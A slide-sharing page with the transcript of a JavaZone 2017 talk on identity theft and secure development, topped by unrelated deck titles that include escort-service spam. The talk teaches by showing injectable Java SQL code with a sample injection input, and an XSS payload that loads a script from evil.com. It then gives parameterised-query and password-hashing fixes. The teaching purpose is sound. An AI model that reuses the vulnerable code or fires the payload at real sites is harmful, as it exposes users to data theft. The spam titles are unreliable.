A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with Precision
 
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software Developers
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
 
What is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsWhat is Binary Language? Computer Number Systems
What is Binary Language? Computer Number Systems
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptx
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 

Identity theft developers key to protecting data at JavaZone 2017

  • 1. Identity theft developers are key JavaZone 2017
  • 2. Identity theft Cybercrime Hard to get rid of the consequences
 We create the code We protect the data
  • 3. Are we part of the solution Or part of the problem?
  • 5. Cybercrime Real threat and it is growing Organised and professional it’s a business
 Risks are low We are not ready Lot of money involved
  • 6. How profitable is cybercrime? Bank of Iraq Heist (2003) 
 1 Billion dollars US Military and Defence Expanses (2015)
 600 Billion dollars Cyber crime damage world wide (2016)
 3 Trillion dollars
  • 7. Identity theft Identity theft is the deliberate use of someone else's identity, usually as a method to gain a financial advantage or obtain credit and other benefits in the other person's name, and perhaps to the other person's disadvantage or loss. The person whose identity has been assumed may suffer adverse consequences if they are held responsible for the perpetrator's actions.
  • 8. Kevin Goes (30) Some else used a copy of his passport
 
 and rented several houses
  • 10. Data is like crude oil by itself it is dead, but comes to live when applying the right kind of science
  • 11.
  • 12. What can we do as developers Protect yourself & be aware
  • 13. Protect youself Where do I leave my notebook ? Where do I store my passwords ? Do I use my password multiple times ? Is my software up to date ? 2 step verification ? What wifi hotspot do I use ?
  • 14.
  • 16. Our application What we think it is What it actually is
  • 17.
  • 18. How many dependencies? Are all needed? Are all up-to-date? Are all reliable? Dependencies
  • 19.
  • 21. Security as part of your development process business value VS security code reviews clean code = secure code
  • 22. OWASP - ASVS Open Web Application Security Project Application Security Verification Standard https://www.owasp.org/index.php/ Category:OWASP_Application_Securit y_Verification_Standard_Project
  • 23. Code review String url = "jdbc:postgresql://localhost:5432/test?user=brian&password=brian";
 Connection conn = DriverManager.getConnection(url);
 Statement stmt = conn.createStatement();
 
 String newName = request.getParameter("name");
 String sql = "UPDATE Users SET name = '" + newName + "' WHERE id=1";
 
 stmt.execute(sql);
  • 24. Code review String url = "jdbc:postgresql://localhost:5432/test?user=brian&password=brian";
 Connection conn = DriverManager.getConnection(url);
 Statement stmt = conn.createStatement();
 
 String newName = request.getParameter("name");
 String sql = "UPDATE Users SET name = '" + newName + "' WHERE id=1";
 
 stmt.execute(sql); what if my input = ' '; ' UPDATE USERS SET NAME =' '; ' WHERE id=1;
  • 25. SQL Injection String url = "jdbc:postgresql://localhost:5432/test?user=brian&password=brian";
 Connection conn = DriverManager.getConnection(url);
 Statement stmt = conn.createStatement();
 
 String newName = request.getParameter("name");
 String sql = "UPDATE Users SET name = '" + newName + "' WHERE id=1";
 
 stmt.execute(sql); what if my input = ' '; UPDATE Users SET name = ' ' UPDATE USERS SET NAME =' '; UPDATE Users SET name = '' WHERE id=1;
  • 26. Query Parameterization String url = "jdbc:postgresql://localhost:5432/test?user=brian&password=brian";
 Connection conn = DriverManager.getConnection(url);
 
 String newName = request.getParameter("name");
 String sql = "UPDATE Users SET name = ? WHERE id=1";
 
 PreparedStatement pstmt = conn.prepareStatement(sql);
 pstmt.setString(1, newName);
 pstmt.executeUpdate();
  • 28. Password protection Don’t store plain text Don’t limit the password length Don’t limit the character set Don’t use an ordinary hash function
  • 29. Password protection Use a password policy Use a cryptographically strong credential-specific salt Use a cryptographic hash algorithm (e.g. PBKDF2) Use a HMAC (keyed-hash message authentication code), HMAC-SHA256 Design to be compromised
  • 30. XSS (Cross Side Scripting) http://www.javazone.no/saveComment?comment=JavaZone+is+Awesome! <h3> Thank you for you comments! </h3> You wrote: <p/> JavaZone is Awesome <p/>
  • 31. XSS (Cross Site Scripting) http://www.javazone.no/saveComment?comment=<script src="evil.com/ x.js"></script> <h3> Thank you for you comments! </h3> You wrote: <p/> <script src="evil.com/x.js"></script> <p/>
  • 32. Summary BE AWARE Protect yourself Integrate security in development process https://www.owasp.org
 ASVS